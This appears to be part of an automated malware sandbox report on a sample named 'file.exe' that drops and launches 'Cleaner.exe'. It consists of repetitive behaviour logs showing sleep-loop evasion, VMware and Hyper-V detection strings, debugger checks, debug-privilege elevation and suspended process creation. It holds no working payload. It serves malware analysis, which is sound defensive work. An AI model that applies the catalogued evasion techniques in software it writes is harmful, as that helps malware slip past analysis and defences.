Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 5340	Thread sleep count: 119 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5340	Thread sleep time: -71400s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4692	Thread sleep time: -60000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: Amcache.hve.30.dr	Binary or memory string: VMware
Source: Amcache.hve.30.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Cleaner.exe, 00000021.00000002.658091156.0000024B7E02C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: file.exe, 00000000.00000000.308421884.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: Amcache.hve.30.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.30.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.30.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.30.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000000.306966127.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.30.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.30.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.30.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.30.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.30.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.30.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.30.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Process token adjusted: Debug

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"	Jump to behavior

Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: F.program manager^
Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: program manager

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
